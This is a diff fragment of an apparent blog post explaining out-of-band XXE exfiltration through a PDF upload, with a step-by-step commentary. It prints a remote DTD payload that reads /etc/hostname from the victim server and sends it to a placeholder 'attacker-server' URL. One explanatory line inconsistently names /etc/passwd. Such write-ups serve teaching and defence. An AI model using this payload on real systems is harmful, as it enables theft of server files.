saurinn/saurinn.github.com/src/pages/blog/xxe-oob-via-a-pdf-upload.md

 <!ENTITY % file SYSTEM "file:///etc/hostname">
 <!ENTITY % ent "<!ENTITY data SYSTEM 'https://attacker-server/?x=%file;'>">
 ```
 3. `<!ENTITY % file SYSTEM "file:///etc/passwd">`: The parser reads this line from the remote DTD.
-It defines another parameter entity, <b>%file></b>, which is instructed to read the contents of the <code>/etc/hostname</code> file from the victim server's filesystem.
+It defines another parameter entity, %file, which is instructed to read the contents of the <code>/etc/hostname</code> file from the victim server's filesystem.

 4. `<!ENTITY % ent "<!ENTITY data SYSTEM 'https://attacker-server/?x=%file;'>">`: This is a nested entity.
 It defines a parameter entity <b>%ent</b> whose value is the full declaration for a general entity named <b>data</b>.
 This part is key because it ensures the file content (%file) is read and included within the URL of the final call.